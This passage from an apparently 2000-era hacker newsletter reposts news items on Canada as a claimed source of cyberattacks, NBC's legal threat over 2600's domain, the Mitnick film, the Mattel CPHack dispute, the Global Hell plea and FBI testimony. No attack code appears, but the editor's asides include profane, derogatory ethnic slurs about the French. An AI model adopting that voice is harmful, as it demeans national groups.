Yahoo!, eBay and other U.S.-based commercial sites. Colonel Randy Alward, commander of the Canadian Forces Information Operations Group, is quoted by the newspaper as saying the high number of hacker attacks coming from Canada is due to a high degree of computerization. The colonel is reported as saying that Canada is a very wired country and that hackers will typically bounce through different computer systems to hide their original location. Welsh Teens Stage Attacks The newspaper noted that Canadians, too, can also be the victims of cybercrimes and cited reports of two teenagers in Wales who were recently arrested following an international investigation by the FBI and the Royal Canadian Mounted Police. The 18-year-olds allegedly used the alias "Curador" to hack into nine e-commerce sites, at least one of which was Canadian, from which they are believed to have stolen more than 26,000 credit card numbers and other personal information, and posted some of it to other hackers. The Citizen said the cost of canceling the cards and issuing new ones will exceed $3 million (US$), and there may be additional losses if the information was used by others to make purchases. However, Sam Porteous, director of intelligence for Kroll Associates Canada, a corporate security firm, warned against taking the intelligence estimates too seriously, saying the military often uses broad definitions of what constitutes a cyberattack. He conceded, though that Americans have valid concerns about Canada, seeing the country as a conduit they don't have control over, and that unnerves them, he told the newspaper. The Citizen cites other cyberwarfare specialists who acknowledge that, while that Canada has a large population of computer literate citizens, question whether the number of Canadian-launched attacks are as high as the intelligence report suggests. Thomas Welch of JAWS Technologies, a computer security firm with U.S. and Canadian offices, said he believes the report overstates Canada's role in cyberterrorism and that, while a good percentage does go through or come from Canada, a large percentage of attacks on Canadian sites go via the United States. -=- We have some packet kiddies and wannabe crackers make the news and now we're public enemy #1 ... phear Canada .. *gag* (kill the media) - Ed now excuse me while I load the molson's canadian into my igloo off the skidoo trailer and club some baby seals for supper ... :-o =-= Canada Called Hotbed Of Cyberterrorism By Martin Stone, Newsbytes OTTAWA, ONTARIO, CANADA, 27 Mar 2000, 8:41 AM CST An American intelligence agency has determined that up to 80 percent of foreign attacks on US computers either originate or pass through Canada. The claim follows suspicions that some recent hacker attacks were routed through Canadian computers. A weekend article by the Ottawa Citizen newspaper said a report prepared last year for Canada's Department of National Defence quotes the US Defence Intelligence Agency, the military counterpart to the CIA, as warning that Canada is seen as a "Zone of Vulnerability." The US Defence Intelligence Agency estimates that a full 80 percent of the attacks upon US systems originate in or pass through Canada, the report stated. The Citizen noted that the report, prepared by Canadian military and intelligence agencies, including the ultra-secret Communications Security establishment, further said, "It is the assessment of the (Canadian government's) Intelligence Policy Group that the United States and our allies will expect Canada to participate in combating and reducing the cyber threat." FBI Director Louis Freeh recently called Canada a "hacker haven." FBI investigators believe one or more Canadian Internet servers were used in the attacks that recently disabled Yahoo.com, eBay and other US-based commercial sites. Colonel Randy Alward, commander of the Canadian Forces Information Operations Group, is quoted by the newspaper as saying the high number of hacker attacks coming from Canada is due to a high degree of computerization. The colonel is reported as saying that Canada is a very wired country and that hackers will typically bounce through different computer systems to hide their original location. The newspaper noted that Canadians, too, can also be the victims of cybercrimes and cited reports of two teenagers in Wales who were recently arrested following an international investigation by the FBI and the Royal Canadian Mounted Police. The 18-year-olds allegedly used the alias "Curador" to hack into nine e-commerce sites, at least one of which was Canadian, from which they are believed to have stolen more than 26,000 credit card numbers and other personal information, and posted some of it to other hackers. The Citizen said the cost of canceling the cards and issuing new ones will exceed $3 million, and there may be additional losses if the information was used by others to make purchases. However, Sam Porteous, director of intelligence for Kroll Associates Canada, a corporate security firm, warned against taking the intelligence estimates too seriously, saying the military often uses broad definitions of what constitutes a cyberattack. He conceded, though that Americans have valid concerns about Canada, seeing the country as a conduit they don't control over, and that unnerves them, he told the newspaper. The Citizen cites other cyberwarfare specialists who acknowledge that, while that Canada has a large population of computer literate citizens, question whether the number of Canadian-launched attacks are as high as the intelligence report suggests. Thomas Welch of JAWS Technologies, a computer security firm with US and Canadian offices, said he believes the report overstates Canada's role in cyberterrorism and that, while a good percentage does go through or come from Canada, a large percentage of attacks on Canadian sites go via the US. Reported by Newsbytes.com, http://www.newsbytes.com . 08:41 CST Reposted 08:59 CST @HWA 127.0 HNN:Mar 28th:2600 Under Fire From NBC ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acopalyse NBC is not happy with 2600 Magazine. 2600 has gone and registered fucknbc.com and point the domain at nbc.com. NBC somehow feels this is a dilution and inappropriate use of their trademark while 2600 rightfully asserts that it is nothing more than a free speech issue. 2600 ZD Net http://www.2600.com/news/2000/0323.html http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2475126,00.html?ch kpt ---------- (fucknbc.com? wait for it ... *snicker* ... Emmanuel, what a rebel.. - Ed) NEW LAWSUIT THREAT FROM NBC 03/23/00 Apparently the corporate media feels it not only owns the Internet, but that it can control opinions and expression as well. Late Wednesday, we received the following letter via email. It concerned one of many "freedom of expression" sites that 2600 is involved with. ----- Forwarded message ----- From: "Lusins, Gillian (NBC)" Gillian.Lusins@nbc.com To: "'emmanuel@2600.com'" emmanuel@2600.com Subject: Website Date: Wed, 22 Mar 2000 17:43:47 -0500 X-Mailer: Internet Mail Service (5.5.2448.0) Dear Mr. Goldstein, I am counsel to National Broadcasting Company, Inc. You are listed as the technical contact for the following site: www.fucknbc.com. The site is currently listed as belonging to "CORE - THE INTERNET COUNCIL OF REGISTRARS, and the site is currently pointing to NBC.com. The use of NBC's name in this domain name constitutes trademark infringment, and is also a violation of our copyright interest in the NBC.com site. Please be aware that a letter is being sent to the listed owners of this site, and that if the site is not taken down immediately, and arrangements made to cease and discontinue all use of this name, we will pursue all necessary legal remedies including instituting litigation in the appropriate venues. Please contact me to discuss this matter upon receipt of this letter at gillian.lusins@nbc.com. Thank you. Gillian Lusins Because e-mail can be altered electronically, the integrity of this communication cannot be guaranteed. ----- End forwarded message ----- It's clear to us that the people at NBC have become separated from some key bits of logic so we will try and help them out. Free speech is at the heart of the net. While companies and other entities are entitled to protect their trademarks, it is entirely acceptable for sites like www.aolsucks.com, www.fuckfrance.com, and even www.fuckgeorgewbush.com to exist without fear of harassment. We invite NBC (or anyone else, but let's give them first crack at it) to register fuck2600.com or 2600sucks.com. And if we feel like registering www.nbcsucksbecausetheyhavelawyerswithtoomuch- timeontheirhands.com, no legal threat is going to convince us not to fight for this very fundamental freedom. We think NBC may have been confused because we were pointing www.fucknbc.com to www.nbc.com. Perhaps they thought we had STOLEN their web site. We've seen bigger leaps in corporate logic so this conclusion is entirely possible. Let us be clear - we were merely POINTING one site to another, something that is perfectly acceptable in the world of the Internet. If your mortal enemy decides to point his/her site at your site, there's not a damn thing you can do about it, nor should you want to. It's how the net works. But, since NBC has brought it up, we would like to have this site do something more than what it's doing now. As a first step towards this, we have pointed the site to this new material they so graciously provided us with. We would like to see a more comprehensive fucknbc site become established. Please email us if you'd like to put together such a site. And if NBC has the guts to apologize, we'll post that too. -=- NBC attacks critical domain name 2600.org no longer points to the Peacock's site, but hacker newsletter says it's another case of cyber bullying and an attack on free Web speech. By Lisa M. Bowman, ZDNet News March 27, 2000 2:45 PM PT The hacker newsletter 2600.org has stopped pointing the domain name f--knbc.com to the official NBC Web site after the media company threatened to sue. NBC alleges that the 2600 site violated both its trademark and copyright interests. 2600 has owned the domain name since late last year. In an e-mail message to Emmanuel Goldstein, who runs the 2600 site, NBC goes further than just requesting that 2600 stop pointing to NBC. It also claims that the use of NBC's name in this way violates the law, an assertion that raises free-speech issues. "If the site is not taken down immediately, and arrangements made to cease and discontinue all use of this name, we will pursue all necessary legal remedies including instituting litigation in the appropriate venture," the message from NBC attorney Gillian Lusins reads. NBC officials could not immediately be reached for comment. Can ICANN intervene? Goldstein said he hasn't received a physical letter, and that this is just one of many such battles his group is fighting. "We're seeing a disturbing increase in corporate intimidation," said Goldstein, who added that 2600.org only changed the URL's destination to call out attention to NBC's ploy. "People need to not buckle to these scare tactics." The letter comes as board members of ICANN -- the nonprofit private corporation charged with doling out domain names -- are deciding whether to add more top-level domains to the current selection that includes .com, .org and others. Some nonprofit stakeholders, such as Ralph Nader's Consumer Project on Technology, have proposed adding words such as ".sucks" and ".isnotfair," so that people critical of a particular company or organization would have a place to express their opinion. However, during a recent board meeting in Cairo, Egypt, ICANN directors didn't seem too receptive of such a plan, pointing out that critics of a company already register domains containing those words, as in "nbcisnotfair." Companies fighting back However, NBC's stance shows that companies are inclined to fight the use of such domain names, even if their efforts thwart free speech. NBC joins a growing list of corporations going after not only cybersquatters who violate their trademarks, but also sites that contain content or domains they don't like. But they haven't been too successful in the most public cases. In January, toy seller eToys Inc. (Nasdaq: ETYS) settled with Swiss art group Etoy, which it had accused of trademark infringement, even though the group had owned the domain before eToys existed. Also, Bally Total Fitness lost an attempt to go after the owners of a domain critical of the company that contained the Bally name. More 2600.org targets Meanwhile, 2600.org is still making mischief, saying it has received many proposals to provide content for the f--knbc site and will pick the best one. Right now, the site points to the NBC letter and 2600's side of the story. "Etoy won their battle, and we believe others will follow if we stick together and refuse to cave in," Goldstein said. Goldstein and his cohorts also have registered the F--kingmorons.com domain name, which leads to the Motion Picture Association of America -- a trade group that has sued 2600 and others, claiming their plans to crack the code that encrypts DVDs violates laws protecting trade secrets and copyrights. (Oh yeah, and btw, HWA sez FUCK YOU NBC! too ..d0rks - Ed) @HWA 128.0 HNN:Mar 28th:Takedown Debuts in France ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by lamer Securityfocus.com reports that Takedown, staring Skeet Ulrich as Kevin Mitnick, has been released in France as "Cybertraque." Reviews so far have been poor. The official movie web site and video clip can be found at www.cybertraque.com Security Focus http://www.securityfocus.com/news/10 ---------- (This must REALLY blow major chunkage to open in France... (!!?!?)... no futher comment on this one, we might get nuclear wasted by the dumb frogs fascist gestapo government... seig heil, besides the French mostly suck anyways...we all know this. - Ed) Mitnick Movie Opens in France "Takedown" movie finally premieres... dubbed in French. By Kevin Poulsen March 27, 2000 1:14 PM PST It may never make it to theatres in the English speaking world, but a controversial motion picture based on the digital manhunt that snared hacker Kevin Mitnick debuted in France this month, to generally poor reviews and unspectacular box office receipts. The movie, from Miramax's genre label Dimension Films, is based on the book "Takedown: The Pursuit and Capture of America's Most Wanted Computer Outlaw -- By The Man Who Did It," authored by computer security expert Tsutomu Shimomura and New York Times reporter John Markoff. Shimomura electronically tracked Mitnick to his Raleigh, North Carolina hideout in February, 1995, and sold the book and movie rights for an undisclosed sum amidst the storm of publicity following the fugitive hacker's arrest Early versions of the screenplay for the movie adaptation of "Takedown" cast Mitnick -- played by Scream star Skeet Ulrich -- as violent and potentially homicidal. In July, 1998, supporters of the then-imprisoned cyberpunk rallied against the film outside Miramax's New York City offices. Writers later revised the script, and shooting wrapped on the project in December, 1998. Since then the film has languished without a US release date, amid rumors of a direct-to-video or cable TV release. The French-dubbed version of the 90 minute film is titled Cybertraque. It opened on March 15th. A promotional web site features streaming video of the theatrical trailer. Miramax publicists didn't return phone calls about the movie. The exact box office take of Cybertraque is unknown, but receipts failed to crack France's top-ten list on the movie's opening weekend. French critics have generally panned the film. A review in the French newspaper Le Monde notes the film's problems in translating a virtual manhunt to the action-adventure genre. "Can the repeated image of faces sweating over keyboards renew the principles of the Hollywood thriller?," the paper asks. "It's easy to say that the filmmaker hardly reaches that point, regardless of his saturation of the soundtrack with rock music to defeat the boredom of the viewer." (translated) Mitnick cracked computers at cell phone companies, universities and ISPs. He pleaded guilty in March, 1999, to seven felonies, and was released from prison on January 21st, 2000, after nearly five years in custody. Last month he testified before a Congressional committee on governmental computer security. @HWA 129.0 HNN:Mar 28th:Mattel Buys Rights to CPHack ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by evenprime CPhack, a program that allows people to defeat Cyber Patrol as well as lists all webs sites filtered by the software, has been bought by Mattel. The authors of the program have signed a seven page assignment agreement that gives Mattel "all rights" to the program's source code and binaries. The rights to the program were sold for one dollar and agreement to drop the lawsuit against them. Wired http://www.wired.com/news/politics/0,1283,35216,00.html ---------- Mattel Stays on the Offensive by Declan McCullagh 2:45 p.m. Mar. 27, 2000 PST BOSTON -- Upping the stakes in a battle over a utility that reveals Cyberpatrol's list of off-limits websites, Mattel threatened mirror sites with contempt charges during a court hearing Monday afternoon. Mattel, which sells Cyberpatrol, said the toy giant had acquired the copyright to "cphack" from the two cryptoanalysts who published it on their website earlier this month in a settlement agreement signed on March 24. Citing a March 16 Slashdot thread that said "it's time to mirror!", Mattel attorney Irwin Schwartz advised against anyone thinking of distributing cphack from now on. "They should be afraid of being hauled into court on contempt proceedings," Schwartz told the judge. Just 25 minutes before the hearing was scheduled to begin, Mattel filed documents with the court saying it was ready to abandon its lawsuit over cphack, which allows owners of Cyberpatrol to view the program's secret encrypted blacklist. As part of the agreement, Mattel said it wanted a permanent court order that applied to mirror sites, too. The American Civil Liberties Union, which is representing three mirror sites, said it did not object to the lawsuit's dismissal -- but it wanted to make sure its clients would not be at risk. ACLU attorney Chris Hansen asked U.S. District Judge Edward Harrington to exempt mirror sites from his order, saying Mattel could simply file another suit if it suspected violations of its new copyright. "My clients do not want to be put to the test of contempt," Hansen said. Contempt citations could include fines or jail time. At the end of the hearing, which lasted one hour, Harrington said he would consider Hansen's request and decide by Wednesday. Harrington said he would continue his earlier temporary restraining order until then. But he indicated he was a little worried about an order that would apply to people who aren't defendants, saying "they have not been heard." The seven-page "assignment agreement" signed by cphack co-author Eddy Jansson of Sweden gives Mattel "all rights" to the program's source code and binaries and an explanatory essay he wrote. Co-author Matthew Skala of Canada signed a similar agreement giving up his rights for one dollar. @HWA 130.0 HNN:Mar 28th:Cyber Security Bill Passes Committee ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench S. 1993 has been approved by the Senate Governmental Affairs Committee last Thursday. The bill will provide "a comprehensive framework" for protecting federal computer records against cyber-attacks by outside attackers. Government Executive Magazine http://www.govexec.com/dailyfed/0300/032400b2.htm ---------- March 24, 2000 DAILY BRIEFING Senate panel approves cyber-security mandates By Spencer Rich, National Journal News Service The Senate Governmental Affairs Committee on Thursday approved legislation (S. 1993) to provide "a comprehensive framework" for protecting federal computer records against cyber-attacks by outside hackers. The bill also seeks to guard against unauthorized disclosures caused by accidental or careless procedures in handling and protecting information. Co-sponsored by Committee Chairman Fred Thompson, R-Tenn., and Ranking Democrat Joseph Lieberman of Connecticut, the bill passed by voice vote. The Clinton Administration had worked with the committee to iron out some issues in the original version of the bill, according to committee aides. When the bill was first introduced last Nov. 19, Thompson complained that "federal agencies continue to use a band-aid approach to computer security rather than addressing the systemic problems which make government systems vulnerable to repeated computer attacks." "Hopefully, the recent breaches of security at the various 'dot.com' companies is the wake-up call needed to focus attention on the security of government computer systems," Thompson said. At that time, Lieberman also observed, "Government computers are rife with sensitive information ... on national security, the strength of our economy, transportation and communications systems and the personal lives of millions of citizens"—as well as the mechanisms for controlling weapons of mass destruction, tracking the offensive movements of enemy states and controlling the economy and threats to public health. All these appeared vulnerable to computer hijacking, he said. Yet, Lieberman said, the General Accounting Office had found that a test unit it set up could crack computerized information systems controlling spacecraft and information gleaned by space exploration, obtain access to State Department networks, veterans' records, tax records and benefit and demographic information. In some cases, the test unit found it would have been able to alter the information in these systems if it wanted to do mischief, he said. Thompson said the weaknesses of the computer information system were essentially a management issue. To correct this, the bill approved Thursday would set up a tight chain of command and responsibility for strengthening and protecting computer records. It would stretch from the director of the Office and Management and Budget at the top to individual departments and agencies below. Each one's progress in developing plans to strengthen computer security and protecting information would be monitored peridiodically by an outside agency, such as the GAO. Each government agency would have to develop a security plan, switch to procedures identified as "best practices,"and make sure the relevant employees are properly informed and trained, under the bill. At the head of this chain of command would be the OMB director. Under him, Thompson explained at Thursday's committee meeting, the deputy OMB director for management "will be responsible for seeing that agencies do what they should in non-defense areas," and the Secretary of Defense and the Director of Central Intelligence would have similar responsibility with regard to national security, defense and other "classified information systems." "They must adopt progams and plans that will make us secure," Thompson added. Thompson said the GAO would monitor the various computer security programs at departments and agencies annually. "This will make it as secure as possible," said Lieberman: "an annual plan and independent audit" of each agency. According to the committee, the bill, as approved, would: Establish clear federal agency accountability for information security. Require each agency to have an annual independent evaluation. Give the Defense Secretary and CIA director responsibility for national security and other classified information system security. (Addition of this provision was one of the major changes made in the original bill by the substitute text, staff aides said.) Give agency managers flexibility to attract the "best and brightest technology talent through the use of scholarships, fellowships and federal service agreements." (This was another major change made by the substitute text, the aides said.) Focus on the importance of training programs. An amendment by Sen. Daniel Akaka, D-Hawaii, added by voice vote, would require agencies to report on the time periods and resources needed to implement agencywide security programs. @HWA 131.0 HNN:Mar 28th:Census Gets NSA to Look at Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench In an effort to protect the private information of millions of Americans the Commerce Department has asked the NSA to test its online security systems. Federal Computer Week http://www.fcw.com/fcw/articles/2000/0327/web-1census-03-27-00.asp ---------- Census tests security BY Judi Hasson 03/27/2000 The Census Bureau has hired a company to try to break into its Internet site and brought in the super-secret National Security Agency to test Census security systems. Census officials said they are certain the data is safe but want to make sure there are no vulnerable spots. "Every day, people are scanning our ports. It’s not just our site. It’s any site, said J. Gary Doyle, who is responsible for systems integration at the Census Bureau. Among the steps that the Census Bureau has taken to protect the decennial count: * Hiring the technology firm Science Applications International Corp. to try to break into the Census’ Internet site, where respondents can file online. SAIC began working last week, and there have been no reports of successful entry into the site. * Enlisting NSA to make sure the site is secure. * Erecting firewalls to prevent penetration. Among the precautions: prohibiting e-mail from entering the site unless there is a specific address on it and barring outside computers from dialing up the census computer in the building. * Encrypting all census data from the time it leaves a data scanning center via a secure telephone line until it arrives at the Census computer center in Bowie, Md. * Making three copies of the data and storing it in different vaults. * Providing backup systems at the Bowie computer center, including generators and air conditioners. The Census Bureau’s precautions have gotten high marks from security experts inside and outside government "Census is using all of the proper security practices," said Richard Smith, vice president of federal operations at Internet Security Systems Inc. "I would guess the likelihood of someone getting in is small." (Chant with me: "I hate faulty formatting routines ...down with buggy software!" yeh I know, i'll do it myself one of these days, sure, right after I buy that MS stock ... -Ed) @HWA 132.0 HNN:Mar 28th:Icomlib 1.0.0 Final Released ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Javaman Icomlib is an API for the ICOM PCR1000 computer controlled receiver for UNIX OS's. Currently it has been officially tested to support SunOS, *BSD, and Slackware 7 Linux, SuSE Linux. Along with the API there is a GUI based on the Qt 2.x toolkit for X that supports multiple styles (CDE style, Motif Stle, Win95 Style, SGI Style). It also include command line applications that implement all of the functions in the api, as well as additional functions like logging, and log-hit scanning. Philtered http://www.philtered.net/projects.phtml ---------- @HWA 133.0 HNN:Mar 28th:China Bans MP3s ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by lamer In an effort to impose some sort of control over electronic commerce, China's The Ministry of Culture has announced laws that ban online sales of imported music and videos and exclude foreign invested Internet companies from selling any audiovisual products. This of course would include MP3s. ABC News http://www.abcnews.go.com/sections/tech/DailyNews/china_mp3ban000325.h tml ---------- @HWA 134.0 HNN:Mar 29th:MostHated to Plead Guilty ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by McIntyre MostHated (Patrick W. Gregory) is expected to plead guilty to charges of one count of conspiracy to commit telecommunications fraud in the U.S. District Court of the Northern District of Texas. The charges stem form the defacement of the White House web page last May. MostHated is thought to be the leader of Global Hell, a group that has taken credit for defacing over 100 web sites. He could receive up to five years in prison, $250,000 in fines and forced to pay up to $2.5 million in restitution. ABC News Attrition.org - Mirrors of Global Hell Defacements http://abcnews.go.com/sections/tech/DailyNews/globalhell000329.html http://www.attrition.org/mirror/attrition/gh.html ---------- March 29 — The co-leader of a teenage cybergang that allegedly hacked into 115 Web sites is expected to plead guilty to conspiracy, marking a victory for the federal government in one of the biggest computer crimes cases yet. Patrick W. Gregory of Houston and dozens of his teenage cohorts defaced Web sites, deleted data and crashed servers, causing as much as $2.5 million in damages, according to court documents. The group, which went by the names “total-Ka0s” and “Global Hell,” became a national concern after officials said it hacked the White House site on May 9. The breach prompted the Secret Service temporarily to shut down White House access to the Internet while it scrambled to block the security flaw. The hackers replaced the government’s site with the words, “Why did we hack this domain? Simple, we f***ing could.” “What makes this so scary from a government standpoint is you’ve got a bunch of kids between 16 and 27 and all of a sudden they start getting on conference calls coordinating their attacks on company after company, just like them going down and vandalizing 14 houses on a block in a row,” said Matt Yarbrough, who was the lead federal prosecutor on the case and is now an e-commerce attorney for Vinson & Elkins of Dallas. ‘MostHateD’ Gregory, 19, has agreed to plead guilty to one count of conspiracy to commit telecommunications fraud and computer hacking, according to documents filed in the U.S. District Court of Northern District of Texas. Gregory, who used the online moniker “MostHateD,” has signed a plea agreement admitting he and other Global Hell members used the Internet to hack into 115 computer systems around the world between January 1997 and May 1999, the court documents say. He was expected to plead guilty in federal court in Dallas today but the hearing has been postponed, Assistant U.S. Attorney Reid Wittliff said. The plea hearing will likely be rescheduled for sometime in the next few weeks. He could receive up to five years in prison and $250,000 in fines. He could also be ordered to pay up to $2.5 million in restitution. “These people would have never come together in one place and been so coordinated if Patrick hadn’t been the driving force behind that,” Yarbrough said. “Essentially, Patrick was the ringleader, the front man and media mind of Global Hell, and the scary force that scared the heck out of companies.” In an exclusive interview with Brian Ross of ABC’s 20/20 in December, Gregory said the White House and other victims should be thankful for Global Hell because the hackers used their computer genius to spot security loopholes in the computer system they target. “If you can get into the high security like that, you’re going to be proud,” Gregory said. “You had the knowledge to do something nobody else in the world could do.” Hackers Plotted on Net Gregory admitted, in the plea agreement, to stealing telephone conferencing services from AT&T, MCI, Sprint and Latitude Communications worth tens of thousands of dollars. He and other members of Global Hell illegally acquired telephone numbers, personal identification numbers and credit card numbers and used them to hold hours of conference calls, during which they would discuss hacking, according to court documents. The group also discussed their hacking plans on Internet chat rooms, specifically on one called “#creep,” the documents said. Once they gained unauthorized access to the computer systems, Gregory and the group’s other members placed various codes, files, programs and services on them, the court papers said. ‘Global Hell Will Not Die’ Typically, the hackers defaced the Web pages of the victims’ sites, replacing them with text and graphics relating to “Global Hell.” The U.S. Army’s page, for example, was replaced with the message, “Global Hell is alive. Global Hell will not die.” The hackers also intentionally deleted data and crashed some of the computer systems, causing hundreds of thousands of dollars in damages in some cases. “These damages were sometimes financial and sometimes intangible, including the loss of faith in the organizations and ‘brand name’ due to the public defacements of their Web sites,” the plea agreement says. Authorities say Gregory personally participated in the hacking of at least three Web sites: 1688.com, the American Retirement Corp.’s site, and Blue Byte Software’s site. After hacking into 1688.com, a design firm, on April 27, 1999, he stole banking information and e-mail passwords and posted them on the Internet, court documents say. Cohorts Convicted Two other Global Hell members have already been convicted. The Global Hell member who hacked into the White House, 19-year-old Eric Burns of Shoreline, Wash., pleaded guilty in federal court last November and was sentenced to 15 months in prison and ordered by the judge not to touch a computer for three years after that. Earlier this month, Chad Davis, 20, of Ashwaubenon, Wis., was sentenced to six months in prison for accessing and altering the Army’s Web site. The judge also ordered that Davis pay $8,054 in restitution to the Army for the cost of restoring the Web site; serve three years of supervised release after the six-month prison term; not have contact with anyone from Global Hell; and gain approval from future employers to use the Internet. “If it’s used wisely, it will carry you over the rainbow,” U.S. District Judge J.P. Stadtmueller said of the Internet. “But you got yourself involved with something that took you down a very different path, causing a problem for one branch of government. “This is a deadly serious business. It’s not something that’s a sandbox play tool.” @HWA 135.0 HNN:Mar 29th:FBI Wants New Laws to Make Their Work Easier ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acopalyse FBI director Louis Freeh has suggested changes to the law that would help track down cyber criminals and make it easier to keep pace with the fastest-growing area of cyber crime in the United States. (Whhhaaaaa, my job is too hard, please pass some laws to make it easier.) C|Net http://news.cnet.com/news/0-1005-200-1595429.html?dtn.head ---------- FBI cracks down on increasing cybercrimes By Reuters Special to CNET News.com March 28, 2000, 12:40 p.m. PT WASHINGTON--The number of cybercrimes being investigated by the FBI has doubled in the past year, and last month's attacks on leading Web sites are the tip of the iceberg, FBI director Louis Freeh said today. Addressing a Senate subcommittee of cybercrime, Freeh suggested changes to the law that would help track down cybercriminals and make it easier to keep pace with the fastest-growing area of crime in the United States. In 1998, Freeh said the FBI opened 547 "computer intrusion" cases, and this more than doubled to 1,154 last year. In 1998, the FBI closed 399 of those cases and 912 last year. "In short, even though we have markedly improved our capabilities to fight cyberintrusions, the problem is growing even faster," he told the committee. Cyberthreats included disgruntled employees, hackers who "cracked" into networks for the thrill of it or for financial gain, and virus writers. Criminal groups and terrorist organizations also used technology more to raise funds, spread propaganda and communicate with each other. Freeh declined to give details of the attacks last month on business Web sites such as Yahoo, eBay and Amazon.com, as these are under investigation. But he said the attacks were "the tip of the iceberg" and demonstrated the ease with which such crimes could be committed. Freeh said U.S. laws have not kept pace with fast-changing technology, adding that the FBI is working with the Justice Department to propose a legislative package to update laws. Responding to his comments, Democratic Sen. Charles Schumer from New York said laws are set up at a "sub-sonic" speed at a time when the process should be faster than the speed of light. Freeh said he does not want "extraordinary powers," just enough to deal with the phenomenal changes that have accompanied the Internet. One problem is that to track down a cybercriminal, court orders often have to be issued in several states. "There is a needless waste of time and resources, and a number of important investigations are either hampered or derailed entirely in those instances," Freeh said. The use of administrative subpoenas would enable investigators to work more efficiently, he said. Senators on the committee said some companies are reluctant to report cybercrimes for fear of harming their stock prices. The president of the Information Technology Association of America, Harris Miller, told the committee that few high-tech firms are interested in being seen by customers as active law enforcement agents. "No company wants information to surface that they have given in confidence that may jeopardize their market position, strategies, customer base or capital investments," he said. Asked about the cooperation of foreign governments, Freeh cited the United States' close relationship with Canada. A couple of weeks ago, Freeh said an FBI office in New Haven picked up an online statement from a youth who said he felt like "shooting up a school." A 14-year-old in a small Canadian town was tracked down and found to have access to explosives and other weaponry. Over the New Year's period, Freeh said he had close contact with Far East and Middle Eastern countries and that FBI agents there had been given access to computers and hard drives to investigate threats against Americans. Freeh said that he visited six areas in the Gulf recently, and all mentioned cybercrime. "The Internet has no boundaries or sovereignty," he said. Story Copyright © 2000 Reuters Limited. All rights reserved. @HWA 136.0 HNN:Mar 29th:Banks Warned to Carefully Screen New Recruits ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by William Knowles In preparation for the upcoming Stop the City protests London police are warning banks to be extra careful screening applicants and to look for people with with 'cyber-spy tendencies'. Police fear that anarchist sympathizers may try to infiltrate companies and sabotage computer systems in support of the protests. The Register UK http://www.theregister.co.uk/000328-000016.html ---------- Posted 28/03/2000 12:14pm by Linda Harrison Watch out! There's a Cyberterrorist about London police are warning banks to look out for cyber terrorists when recruiting staff. Anarchist sympathisers may try to infiltrate companies and sabotage computer systems to help the anti-City protests expected in May, a senior crime prevention officer said yesterday. Norman Russell, head of the City of London police community safety branch, said firms should grill new staff for any cyber-spy tendencies. Job applicants who support the aims of anarchist umbrella group People's Global Action might help demonstrators enter company buildings during the forthcoming Stop the City protests. Alternatively, they could insert viruses in computer files or leak passwords to let hackers penetrate computer systems, the Mail on Sunday reports. And Russell's advice to spot these saboteurs? "Employers should make sure that they take up references of new employees." Sound advice. The Register has gone further, and compiled a few suspicious comments to help employers when they are interviewing City slicker applicants. Anyone letting slip comments like "Bring the Capitalist dogs to their knees!" Or "Cream the City fat cats!" should definitely be treated with caution. As should utterances along the lines of: "The roar of profit and plunder will be replaced by the sounds of rhythms of party and pleasure as a massive carnival of resistance snakes its way through the square mile." (genuine quote - Reclaim the Streets). But in case these cyber-saboteurs have become more CV-savvy, it may be as well to develop your own techniques to pinpoint a likely candidate. The Register welcomes any tips on how to spot a likely lord or lady of misrule. Meanwhile, a new nation has emerged to take the cyberwarfare crown. According to Newsbytes, Canada is now a hotbed of cyberterrorism, responsible for 80 per cent of foreign attacks on US computers. FBI director Louis Freeh went so far as to describe this normally law-abiding Mounty nation as a "hacker haven".® Related stories Anarchists run riot on the Web City faces up to hack attack -=- Fuck i'm sick of seeing "Cyber" in all these lame stories ... - Ed @HWA 137.0 HNN:Mar 29th:CPHack Was GPL'd, Mattel Left Holding the Bag ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Fredrick Mattell may not have gotten exactly what it thought when it purchased the copyright to CPHack. CPHack reveals Cyberpatrol's secret list of off-limits web sites as well as methods to circumvent the program. CPHack was released under the GNU Public license which grants the recipient of the software the right to copy, distribute or modify the program. Legal experts say that that right can not be revoked. Wired http://www.wired.com/news/politics/0,1283,35226,00.html ---------- Mattel Suit Takes GNU Twist by Declan McCullagh 3:00 a.m. Mar. 28, 2000 PST BOSTON -- Mattel's claim of victory Monday in a lawsuit over its Cyberpatrol filtering software may be premature. The toy giant said during a court hearing here that it had acquired intellectual property rights to a program that reveals Cyberpatrol's secret list of off-limits websites and settled the case. Mattel said it planned to use its new copyright in court to ban Internet copying of the "cphack" utility. But cphack's authors released it under the GNU General Public License, which appears to permit unlimited distribution of the original cphack program, even if Mattel now owns the copyright. "Once you do that you can't revoke it," said Bennett Haselton of Peacefire, a group opposed to filtering software that temporarily put up its own cphack mirror site. The Free Software Foundation's GPL agreement says that "the recipient automatically receives a license from the original licensor to copy, distribute or modify the program." Translation: A copyright holder can't change his mind. "GPL is software that cannot be revoked," said Eben Moglen, a law professor at Columbia University and FSF general counsel. "Anyone downstream who possesses a copy of the software may redistribute it. "It's a very amusing case," Moglen said. "If people are going to respond to free software they don't like by trying to wipe it out, they're in for some real trouble." A spokeswoman for Mattel reached late Monday said she didn't know 